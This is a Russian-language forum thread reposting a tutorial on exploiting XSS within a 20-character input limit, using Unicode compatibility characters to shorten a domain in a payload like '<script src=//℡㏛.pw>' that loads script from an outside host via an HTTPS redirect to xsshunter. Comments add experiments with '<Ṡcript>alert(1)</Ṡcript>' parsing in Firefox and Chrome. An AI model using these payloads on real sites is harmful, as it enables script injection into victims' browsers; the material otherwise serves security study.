Статья Хитрости Unicode и эксплуатация XSS при лимите ввода длиной в 20 символов

pablo · 13.12.2019

Межсайтовый скриптинг (XSS) - одна из самых распространенных уязвимостей, которую можно обнаружить чуть ли не на любом сайте в сети интернет (на некоторых, вроде Google и Amazon, придется хорошо поискать - в этих компаниях работают много разработчиков с большим опытом за плечами). Однако, иногда возникают проблемы - например, проблема в количестве символов, которое мы можем ввести, для эксплуатации данной уязвимости. В этом посте мы рассмотрим, как можно решить такую проблему, уложившись, например, лишь в 20 символов.

Совместимость с юникодом

В Unicode одни и те же сложные буквы, вроде Й, Ё, Ç и т.д., можно представить в двух формах - в виде одной буквы или в виде одной базовой буквы (например, «C») и модификаторов. Такой подход был введен в стандарт для обеспечения совместимости с существующими ранее стандартными наборами символов. Таким образом, стандарт нормализации Unicode описывает два вида отношений между символами: Canonical и Compatibility.

Каноническая эквивалентность предполагает, что последовательность двух кодовых пунктов является полностью взаимозаменяемой. Т.е., комбинация из двух символов может быть канонически эквивалентна одному символу - n (маленькая латинская "n" - U+006E) + ◌̃ (тильда - U+0303) = ñ (маленькая латинская "ñ" - U + 00F1).

Совместимая эквивалентность предполагает, что две совместимые последовательности кодовых пунктов выглядят по-разному, но в некоторых ситуациях могут быть взаимозаменяемыми. Например, два латинских символа f, т.е. "ff" (U + 0066 U + 0066), имеют эквивалент одному символу "ﬀ" (U+FB00), но не всегда. По сути, мы видим один и тот же текст, однако последовательность символов не является строго эквивалентной (до тех пор, пока мы не проведем нормализацию).

Проблема с лимитом ввода в 20 символов
Итак, мы нашли уязвимый сайт. Наш пейлоад выглядит так:

Код:

<svg/onload=alert``>

Это то, что мы смогли сделать, имея лимит в 20 символов - остальная часть, что бы мы не вводили, обрезается. Таким образом, мы имеем проблему, ведь "alert" - это не серьезно, мы же просто выведем пустое сообщение на экран. Подгрузка скрипта со своего домена (в обход CORS, конечно же) была бы идеальной и дала бы нам гораздо больше преимуществ для подготовки более сложной атаки.

Особенности Unicode в браузерах
Не для кого не секрет, что в современных браузерах нет никаких проблем с кодировками, как это было раньше. А это значит, что нам ничего не помешает реализовать нашу шалость.

Рассмотрим следующий пейлоад:

Код:

<script src=//ﬀﬀ.pw>

Попробуйте скопировать символы, находящиеся между слезшем и точкой. Заметили? В примере выше, "ﬀ" - это один символ, однако выглядит он как две латинских "f". В таком случае, браузер поведет себя так - он просто интерпретирует "ﬀ" как два символа. Это дает нам огромное преимущество.

Вот ещё примеры символов, которые мы можем использовать:

ﬀ экивалентен ff
℠ экивалентен sm
㏛ экивалентен sr
ﬆ экивалентен st
㎭ экивалентен rad
℡ экивалентен tel

Ещё не все! Больше таких символов можно найти тут.

Реализация
Давайте купим домен telsr.pw.

Как видите, стоит он не дорого - всего 1.28$.

Если мы будем использовать в нашем пейлоаде только стандартные символы, получится, что мы превысим допустимый лимит в 20 символов.

Заменим их на эквиваленты:

Код:

<script src=//℡㏛.pw>

Кажется, мы добились поставленной задачи.

Дальнейшие шаги
Выглядит отлично, но мы не учли одну деталь - если на уязвимом сайте будет использоваться HTTPS-протокол, то при импорте любого скрипта, он будет подружаться по этому же протоколу.

Я задумал реализовать DNS-редирект с telsr.pw на xsshunter.com.

И тут появляется ещё одна проблема - так как используется протокол HTTPS, если мы выполним перенаправление при помощи DNS на другой сайт, произойдет несоответствие сертификата, и файл Javascript не будет загружен.

Решается такая проблема следующим образом:

Покупаем хостинг для нашего домена, я использую namecheap.com за 1.44$/месяц.
Выпускаем для него HTTPS сертификат (бесплатно от Let's Encrypt)
Загружаем простой HTML-файл c соответствующим мета тегом для редиректа, либо пишем PHP-скрипт, либо используем .htaccess. Тут уже дело вкуса. Объяснять, как это делается, я не буду - все гуглится одной строчкой, реализация аналогична.

4. Из - за того, что мы уже не используем DNS-редирект, XSS успешно эксплуатируется.

Источник: https://t.me/cybred

RedBear · 13.12.2019

Круговорот материалов в природе:
t.me/cybred -> codeby -> https://jlajara.gitlab.io/posts/2019/11/30/XSS_20_characters.html (реальный источник)

sheva · 23.03.2024

Jorge Lajara Website

Personal Blog

jlajara.gitlab.io

Aakkko сказал(а):

уже 404, есть новая ссылка на то, что ты хотел скинуть?

petrinh1988 · 26.03.2024

Большое спасибо за материал! Очень интересная информация.

Решил, ради интереса, сделать следующий финт ушами. Создал обычный HTML5 документ и попытался спрятать script за Unicode следующим образом:

HTML:

<Ṡcript>alert(1)</Ṡcript>

И получил совершенно неожиданный для себя результат:

И черт его знает, что с этим теперь делать)))) Получается, открывающий тэг полностью проигнорирован. А вот вместо закрывающего, браузер выдал комментарий.

Сначала подумалось, что символ «Ṡ» браузер интерпретирует, как «!», а значит можно подобрать набор символов, которые полноценно заменят угловые скобки и тогда WAF пойдут лесом и почти каждый сайт в интернет будет подвержен жесткому XSS-изнасилованию... но нет, дальнейшие попытки исследования показали, что сочетание </+Unicode-символ браузер тупо в комментарий убирает. Как я это понял? Элементарно, взял табличку из статьи, удалил скриптами ненужные столбцы и сделал несколько вариантов вывода.

Выходит все? Тупик? Или есть смысл копать? Прошу хотя бы намекнуть)))) Вдруг не зря время убил.

Мало ли, вдруг кому потребуется мой говнокод, он под хайдом:

Скрытый контент для зарегистрированных пользователей.

Код:

Array.from(document.querySelectorAll('tr'))
.map(tr => Array.from(tr.querySelectorAll('td'))
.map((el, ind) => ind > 0 ? el.remove() : el))

Array.from(document.querySelectorAll('tt')).forEach(el => el.remove())
Array.from(document.querySelectorAll('br')).forEach(el => el.remove())

/* Безуспешная попытка заменить < символом*/
Array.from(document.querySelectorAll('td'))
.map(el => el.innerText + 'script>alert(1)' + el.innerText + '/script>').join('<br>\r\n')

/* Тест показавший, что все уходет в комменты*/
Array.from(document.querySelectorAll('td'))
.map(el => '</' + el.innerText).join('<br>\r\n')

P.S.
На концовочку попробовал поменять изначальное

HTML:

<Ṡcript>alert(1)</Ṡcript>

на

HTML:

<Ṡcript>alert(1)</script>

и

HTML:

<script>alert(1)</Ṡcript>

В первом случае, браузер просто отбросил закрывающий тег, что в целом ожидаемо. А вот во втором варианте, я не особо понял по какой такой причине, вышла коллизия с закрывающим тэгом. Почему-то браузер не только запихал закрывающий тэг за рамки html, но и прифигачил еще один закрывающий </body>. Это что получается? что можно убрать "под хайд" все, что идет после <script>?

P.P.S. Баловался в Firefox, пойду погляжу чего будет в Chrome... User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0

petrinh1988 · 26.03.2024

Раз уж начал, допишу про Chrome.
В отношении <Ṡcript>alert(1)</Ṡcript> все пошло практически идентично. За исключением того, что в варианте с открывающим тэгом <script> Chrome выдал не только два закрывающих </body>, но и </html>. А попытка по другому вывести массово символы Unicode, в виде /⒨<br>, Chrome завернул все символы в <font style="vertical-align: inherit;"></font>. Причем, рандомным образом браузер сбивается, в какой-то момент просто собирая кучу символов в один большой <font style="vertical-align: inherit;"></font>, но и каждый внутри этого font тоже обернул в font. Более того, после большого блока, для каждого символа создал еще по блоку, но пустому. В общем, где-то подтраивает Google с такими финтами.

Ну и вот, что идет после "большого блока font":

Вообще, в целом, сложно понять, по какой логике Chrome оборачивал юникод в фонты. Где-то в блок фонт помещен весь текст с юникодом и слэшем, где-то внутри блока фонт создано по отдельному блоку фонт под слэш и юникод. Такое ощущение, что он руководствовался принципом "и так сойдет".

Статья Хитрости Unicode и эксплуатация XSS при лимите ввода длиной в 20 символов

pablo

(L2) cache

RedBear

RAID-массив

sheva

RAID-массив

Jorge Lajara Website

petrinh1988

X-pert

petrinh1988

X-pert